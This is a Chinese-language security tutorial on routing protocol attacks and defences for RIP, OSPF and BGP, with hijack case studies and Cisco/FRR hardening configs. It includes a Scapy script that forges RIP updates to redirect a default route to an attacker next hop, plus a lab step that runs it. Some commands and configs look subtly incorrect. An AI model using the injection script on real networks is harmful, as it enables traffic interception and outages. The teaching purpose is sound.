Day-008-路由协议安全 RIP-OSPF-BGP

# Day 07: 路由协议安全（RIP/OSPF/BGP）

> 网络安全系列第 7 天 | 预计阅读时间：35 分钟 | 难度：★★★★☆

---

## 清单 目录

1. [路由协议基础](#路由协议基础)
2. [RIP 协议安全](#rip 协议安全)
3. [OSPF 协议安全](#ospf 协议安全)
4. [BGP 协议安全](#bgp 协议安全)
5. [路由劫持攻击](#路由劫持攻击)
6. [历史案例分析](#历史案例分析)
7. [实验环境搭建](#实验环境搭建)
8. [实战演练](#实战演练)
9. [防护策略与最佳实践](#防护策略与最佳实践)
10. [总结与思考](#总结与思考)
11. [参考资料](#参考资料)

---

## 路由协议基础

### 路由协议的作用

如果把互联网比作全球物流网络，那么路由协议就是**物流调度系统**，负责决定每个包裹（数据包）应该走哪条路线才能最快、最可靠地到达目的地。

**路由协议核心功能**：
```
1. 路径发现
   - 发现可达的网络
   - 学习网络拓扑
   - 建立路由表

2. 路径选择
   - 计算最优路径
   - 考虑因素：距离、带宽、延迟
   - 动态调整路由

3. 故障恢复
   - 检测链路故障
   - 自动切换备用路径
   - 收敛到新的拓扑
```

### 路由协议分类

```
按作用范围分类：

1. IGP（内部网关协议）
   用于同一组织内部网络
   
   常见协议：
   - RIP（Routing Information Protocol）
   - OSPF（Open Shortest Path First）
   - IS-IS（Intermediate System to Intermediate System）
   - EIGRP（Cisco 私有）

2. EGP（外部网关协议）
   用于不同组织之间网络
   
   唯一标准：
   - BGP（Border Gateway Protocol）
   - 互联网的"粘合剂"

按算法类型分类：

1. 距离矢量（Distance Vector）
   - RIP
   - 原理：告诉邻居"我到哪里有多远"
   - 类比：路标指示"北京 100km"

2. 链路状态（Link State）
   - OSPF, IS-IS
   - 原理：告诉全网"我连接了谁"
   - 类比：每个人画地图，然后拼成完整地图

3. 路径矢量（Path Vector）
   - BGP
   - 原理：告诉邻居"我经过哪些 AS 到达目的地"
   - 类比：旅行路线"北京→上海→广州"
```

---

## RIP 协议安全

### RIP 协议详解

**RIP 基础**：
```
RIP（Routing Information Protocol）是最古老的路由协议之一，1988 年标准化。

特点：
- 基于距离矢量算法
- 使用跳数（Hop Count）作为度量
- 最大跳数：15（16 表示不可达）
- 更新周期：30 秒
- 认证：RIPv2 支持明文/MD5

适用场景：
✓ 小型网络（<15 跳）
✓ 简单拓扑
✓ 老旧设备兼容

不适用：
✗ 大型网络（超过 15 跳）
✗ 复杂拓扑
✗ 需要快速收敛
```

**RIP 工作原理**：
```
工作流程：

1. 初始状态
   路由器启动，只知道直连网络

2. 定期广播
   每 30 秒向邻居发送路由表
   "我能到达这些网络，距离是 X 跳"

3. 路由学习
   收到邻居的路由表
   如果通过邻居到达某网络更近
   更新自己的路由表

4. 收敛
   所有路由器达成一致
   通常需要几分钟

类比理解：
就像一群人互相告诉对方：
"我到北京 100km，到上海 200km"
每个人根据邻居的信息，
计算出自己到各地的最短距离。
```

### RIP 安全威胁

**1. 路由注入攻击**
```
攻击原理：
攻击者伪造 RIP 更新，
注入虚假路由信息，
将流量引导到攻击者控制的网络。

攻击场景：
┌──────────┐    ┌──────────┐    ┌──────────┐
│  受害者  │────│  路由器  │────│  互联网  │
└──────────┘    └────┬─────┘    └──────────┘
                     │
              ┌──────▼──────┐
              │   攻击者    │
              │  伪造 RIP   │
              └─────────────┘

攻击者发送：
"到互联网，我这里只有 1 跳（最近）"

路由器相信后：
所有互联网流量都转发给攻击者

后果：
- 流量被窃听
- 流量被丢弃（DoS）
- 流量被篡改
```

**2. 路由黑洞攻击**
```
攻击原理：
注入指向不存在网络的路由，
导致流量被丢弃。

示例：
攻击者宣告：
"192.168.100.0/24 我这里 1 跳"

实际上攻击者没有这个网络，
流量到达后被丢弃。

影响：
- 目标网络不可达
- 难以定位问题
- 可能影响关键业务
```

**3. 路由环路攻击**
```
攻击原理：
注入错误路由，
导致路由器之间形成环路。

示例：
路由器 A 认为：到网络 X 走 B
路由器 B 认为：到网络 X 走 A

结果：
数据包在 A 和 B 之间来回转发，
直到 TTL 耗尽被丢弃。

影响：
- 网络拥塞
- 带宽浪费
- 服务中断
```

### RIP 攻击演示

**使用 Scapy 注入路由**：
```python
#!/usr/bin/env python3
# rip_attack.py
# RIP 路由注入攻击演示（仅用于学习）

from scapy.all import *
from scapy.contrib.rip import *

# 目标网络
TARGET_NETWORK = "0.0.0.0"  # 默认路由
TARGET_NETMASK = "0.0.0.0"
ATTACKER_HOP = 1  # 宣告很近

# 构造恶意 RIP 响应
ip = IP(dst="224.0.0.9")  # RIP 组播地址
udp = UDP(sport=520, dport=520)
rip = RIP(cmd=2, ver=2)  # Response

# 注入默认路由
ripentry = RIPEntry(
    af=2,  # IP
    addr=TARGET_NETWORK,
    mask=TARGET_NETMASK,
    nexthop="192.168.1.100",  # 攻击者控制的下一跳
    metric=ATTACKER_HOP
)

# 发送恶意 RIP 更新
packet = ip/udp/rip/ripentry
sendp(packet, iface="eth0")

print(f"[*] 已发送恶意 RIP 更新")
print(f"    宣告：{TARGET_NETWORK}/{TARGET_NETMASK}")
print(f"    下一跳：192.168.1.100")
print(f"    跳数：{ATTACKER_HOP}")
```

### RIP 防护配置

**Cisco 路由器配置**：
```bash
# 启用 RIPv2（支持认证）
router rip
 version 2
 no auto-summary

# 配置 MD5 认证
key chain RIP-KEY
 key 1
  key-string MySecretKey123
  accept-lifetime 00:00:00 Jan 1 2024 infinite
  send-lifetime 00:00:00 Jan 1 2024 infinite

# 在接口启用认证
interface GigabitEthernet0/0
 ip rip authentication mode md5
 ip rip authentication key-chain RIP-KEY

# 被动接口（不发送更新）
passive-interface GigabitEthernet0/1

# 邻居认证
neighbor 192.168.1.2

# 路由过滤
distribute-list 1 in
access-list 1 permit 192.168.1.0 0.0.0.255
access-list 1 deny any
```

---

## OSPF 协议安全

### OSPF 协议详解

**OSPF 基础**：
```
OSPF（Open Shortest Path First）是目前最常用的 IGP 协议，1989 年标准化。

特点：
- 基于链路状态算法
- 使用 Dijkstra 算法计算最短路径
- 使用 Cost 作为度量（基于带宽）
- 支持区域划分
- 认证：明文/MD5/SHA

优势：
✓ 快速收敛（秒级）
✓ 支持大型网络
✓ 支持 VLSM/CIDR
✓ 支持等价多路径

适用场景：
✓ 企业网络
✓ 数据中心
✓ 服务提供商网络
```

**OSPF 工作原理**：
```
工作流程：

1. 发现邻居
   发送 Hello 包
   发现直连的 OSPF 路由器

2. 建立邻接关系
   交换 DBD（数据库描述）
   同步链路状态数据库

3. 泛洪 LSA
   发送 LSA（链路状态通告）
   描述自己的连接状态

4. 计算路由
   使用 SPF 算法
   计算到所有网络的最短路径

5. 维护
   定期发送 Hello
   检测邻居失效

类比理解：
就像每个人画自己周围的地图，
然后互相交换，
最后每个人都有一张完整的地图，
自己计算到各地的最短路径。
```

### OSPF 安全威胁

**1. LSA 注入攻击**
```
攻击原理：
攻击者伪造 LSA，
注入虚假链路状态信息，
影响 SPF 计算结果。

攻击场景：
攻击者发送伪造 LSA：
"我连接到核心网络，Cost=1（最优）"

所有路由器重新计算 SPF，
认为通过攻击者到达核心网络最近，
流量被重定向到攻击者。

后果：
- 流量被窃听
- 流量被丢弃
- 网络拓扑混乱
```

**2. 区域边界攻击**
```
攻击原理：
攻击者位于区域边界，
伪造区域间路由信息。

影响：
- 区域间路由错误
- 流量被错误引导
- 难以检测（跨区域）
```

**3. 虚链路攻击**
```
攻击原理：
利用 OSPF 虚链路机制，
建立非法连接。

影响：
- 绕过区域隔离
- 访问受限区域
- 注入恶意路由
```

### OSPF 防护配置

**Cisco 路由器配置**：
```bash
# 启用 OSPF 认证
router ospf 1
 area 0 authentication message-digest

# 配置接口认证
interface GigabitEthernet0/0
 ip ospf message-digest-key 1 md5 MySecretKey123
 ip ospf authentication message-digest

# 被动接口（不建立邻居）
passive-interface GigabitEthernet0/1

# 邻居认证
neighbor 192.168.1.2 authentication-key MySecretKey123

# 区域认证
area 0 authentication message-digest

# 路由过滤
distribute-list 1 in
access-list 1 permit 192.168.1.0 0.0.0.255
```

---

## BGP 协议安全

### BGP 协议详解

**BGP 基础**：
```
BGP（Border Gateway Protocol）是互联网的核心路由协议，1989 年标准化，当前版本是 BGP-4。

特点：
- 基于路径矢量算法
- 使用 TCP 179 端口
- 策略驱动路由
- 支持 CIDR
- 无内置认证

重要性：
✓ 互联网"粘合剂"
✓ 连接全球 AS（自治系统）
✓ 承载全球互联网流量
✓ 关键基础设施

风险：
✗ 信任模型脆弱
✗ 无前缀验证
✗ 易受劫持攻击
✗ 影响范围大
```

**BGP 工作原理**：
```
工作流程：

1. 建立 TCP 连接
   BGP 使用 TCP 179 端口
   建立可靠连接

2. 交换路由信息
   发送 OPEN 消息
   交换 UPDATE 消息
   宣告可达前缀

3. 路径选择
   基于多种属性：
   - AS_PATH 长度
   - LOCAL_PREF
   - MED
   - 其他策略

4. 传播路由
   向邻居传播学到的路由
   遵循策略规则

类比理解：
就像国际物流公司，
互相告诉合作伙伴：
"我能到美国，经过日本、太平洋"
每个公司根据这些信息，
选择最优的国际运输路线。
```

### BGP 安全威胁

**1. BGP 劫持攻击**
```
攻击原理：
攻击者宣告不属于自己的 IP 前缀，
吸引流量到自己的网络。

攻击场景：
┌──────────┐    ┌──────────┐    ┌──────────┐
│  受害者  │────│   AS1    │────│   AS2    │
└──────────┘    └────┬─────┘    └────┬─────┘
                     │               │
              ┌──────▼──────┐        │
              │   攻击者    │◄───────┘
              │  宣告受害者 │
              │  的 IP 前缀   │
              └─────────────┘

正常路由：
受害者 → AS1 → AS2 → 互联网

劫持后：
受害者 → 攻击者 →（流量被窃取）

后果：
- 流量被窃听
- 流量被篡改
- 服务中断
```

**2. 路径篡改攻击**
```
攻击原理：
修改 AS_PATH 属性，
影响路由选择。

示例：
原始路径：AS1 AS2 AS3 AS4
篡改后：AS1 AS4（更短）

结果：
其他 AS 选择更短路径，
流量经过攻击者。
```

**3. BGP 会话劫持**
```
攻击原理：
劫持 BGP TCP 会话，
注入恶意路由更新。

条件：
- 能够嗅探流量
- 能够注入数据包
- 知道 TCP 序列号

后果：
- 路由表被篡改
- 流量被重定向
```

---

## 历史案例分析

### 案例 1: YouTube 被劫持（2008）

```
时间：2008 年 2 月 24 日
影响：全球 YouTube 中断 2 小时
原因：巴基斯坦电信误配置

事件经过：
1. 巴基斯坦政府要求屏蔽 YouTube
2. 巴基斯坦电信配置 BGP，宣告 YouTube 前缀
3. 错误地将路由传播到全球
4. 全球流量被引导到巴基斯坦
5. YouTube 不可达

影响：
- 全球用户无法访问 YouTube
- 持续约 2 小时
- 暴露 BGP 安全问题

教训：
- 需要前缀验证（RPKI）
- 需要路由过滤
- 需要监控异常宣告
```

### 案例 2: 亚马逊 Route 53 被劫持（2018）

```
时间：2018 年 4 月
影响：MyEtherWallet 用户被盗 15 万美元
原因：BGP 劫持 + DNS 劫持

事件经过：
1. 攻击者劫持亚马逊 IP 前缀
2. 将 DNS 流量引导到攻击者 DNS 服务器
3. 返回虚假 IP 地址
4. 用户访问假冒的 MyEtherWallet
5. 输入私钥，资金被盗

影响：
- 15 万美元加密货币被盗
- 用户信任受损
- 暴露 DNS+BGP 联合攻击风险

教训：
- DNSSEC 必要性
- BGP 监控重要性
- 多因素认证必要性
```

### 案例 3: 俄罗斯劫持多个美国机构（2017）

```
时间：2017 年 7 月
影响：多个美国政府和企业流量被劫持
原因：恶意 BGP 宣告

事件经过：
1. 俄罗斯 AS 宣告多个美国机构前缀
2. 包括政府、银行、科技公司
3. 流量被引导到俄罗斯
4. 持续数小时才被发现

影响：
- 敏感流量可能被窃听
- 暴露 BGP 监控不足
- 地缘政治风险

教训：
- 需要实时 BGP 监控
- 需要快速响应机制
- 需要国际合作
```

---

## 实验环境搭建

### GNS3/EVE-NG 拓扑

```
┌─────────┐         ┌─────────┐
│   R1    │─────────│   R2    │
│  AS100  │         │  AS200  │
└────┬────┘         └────┬────┘
     │                   │
     │                   │
┌────▼────┐         ┌────▼────┐
│   R3    │─────────│   R4    │
│  AS300  │         │  AS400  │
└─────────┘         └─────────┘

R1-R2: eBGP 连接
R2-R4: eBGP 连接
R1-R3: iBGP 连接
R3-R4: eBGP 连接
```

### FRRouting 配置

```bash
# 安装 FRR
apt install frr frr-pythontools

# BGP 配置示例（R1）
vtysh
conf t
router bgp 100
 bgp router-id 1.1.1.1
 neighbor 192.168.1.2 remote-as 200
 neighbor 192.168.1.3 remote-as 300
 network 10.0.0.0/24
exit

# 查看 BGP 状态
show ip bgp summary
show ip bgp
```

---

## 实战演练

### 实验 1: RIP 路由注入

**目标**：演示 RIP 攻击

**步骤**：
```bash
# 1. 搭建 RIP 环境（GNS3）
# 2 台路由器，运行 RIPv2

# 2. 使用 Scapy 发送伪造更新
python3 rip_attack.py

# 3. 观察路由表变化
# 在路由器上：
show ip route
# 应看到注入的路由

# 4. 验证流量重定向
# 发送测试流量
# 观察是否被重定向
```

### 实验 2: BGP 前缀劫持检测

**目标**：学习 BGP 监控

**步骤**：
```bash
# 1. 使用 BGPStream 监控
bgpstream -c risk -f prefix=目标前缀

# 2. 检查异常宣告
# 新起源 AS
# 路径变化
# 前缀更具体宣告

# 3. 使用 Looking Glass
# https://lg.he.net/
# 查看全球 BGP 视图
```

---

## 防护策略与最佳实践

### RIP 防护

```
1. 启用认证
   - 使用 MD5 认证
   - 定期更换密钥
   - 密钥管理

2. 路由过滤
   - 只接受合法前缀
   - 限制跳数
   - 过滤私有地址

3. 被动接口
   - 不需要的接口设为被动
   - 减少攻击面
```

### OSPF 防护

```
1. 启用认证
   - 使用 MD5/SHA 认证
   - 每区域独立密钥
   - 定期轮换

2. 区域划分
   - 合理划分区域
   - 限制 LSA 传播
   - 使用 Stub 区域

3. 监控
   - 监控 LSA 变化
   - 检测异常 SPF 计算
   - 告警配置
```

### BGP 防护

```
1. RPKI（资源公钥基础设施）
   - 前缀来源验证
   - ROA（路由来源授权）
   - 部署率逐步提升

2. 前缀过滤
   - 只接受授权前缀
   - 限制前缀长度
   - 过滤私有地址

3. AS_PATH 过滤
   - 过滤私有 AS
   - 限制 AS_PATH 长度
   - 检测异常路径

4. BGP 监控
   - 实时监控 BGP 更新
   - 检测异常宣告
   - 快速响应

5. 会话安全
   - TCP MD5 签名
   - TTL 安全（GTSM）
   - 会话认证
```

---

## 总结与思考

### 核心要点回顾

1. **RIP**
   - 简单但安全性差
   - 已逐步淘汰
   - 认证是基本要求

2. **OSPF**
   - 企业常用
   - 需配置认证
   - 区域隔离重要

3. **BGP**
   - 互联网核心
   - 信任模型脆弱
   - RPKI 是关键

### 深入思考问题

1. **RPKI 采用率低的原因**？
   - 部署复杂
   - 成本考虑
   - 意识不足

2. **区块链能否用于路由安全**？
   - 去中心化信任
   - 不可篡改记录
   - 技术挑战

3. **SDN 对路由安全的影响**？
   - 集中控制
   - 新攻击面
   - 安全机遇

### 实战建议

**企业网络**：
1. 启用路由认证
2. 配置路由过滤
3. 监控路由变化
4. 定期安全审计

**ISP/数据中心**：
1. 部署 RPKI 验证
2. 配置前缀过滤
3. 实施 BGP 监控
4. 参与 BGP 社区

---

## 参考资料

### 标准文档
- RFC 1058 (RIP)
- RFC 2328 (OSPF)
- RFC 4271 (BGP)
- RFC 6810 (RPKI)

### 工具资源
- [FRRouting](https://frrouting.org/)
- [BIRD](https://bird.network.cz/)
- [BGPStream](https://bgpstream.com/)

### 在线资源
- [BGP 监控](https://bgp.he.net/)
- [RIPE RIS](https://www.ripe.net/analyse/internet-measurements/routing-information-service-ris)

### 书籍推荐
- 《路由交换技术》
- 《BGP 设计与实现》
- 《网络路由协议安全》

---

**标记 明日预告**：Day 08 - VLAN 安全与 VLAN Hopping

> 本文内容仅供学习和研究使用，请勿用于非法目的。所有实验请在隔离环境中进行。

---

*本文是 365 天信息安全技术系列的第 7 篇，精编版本*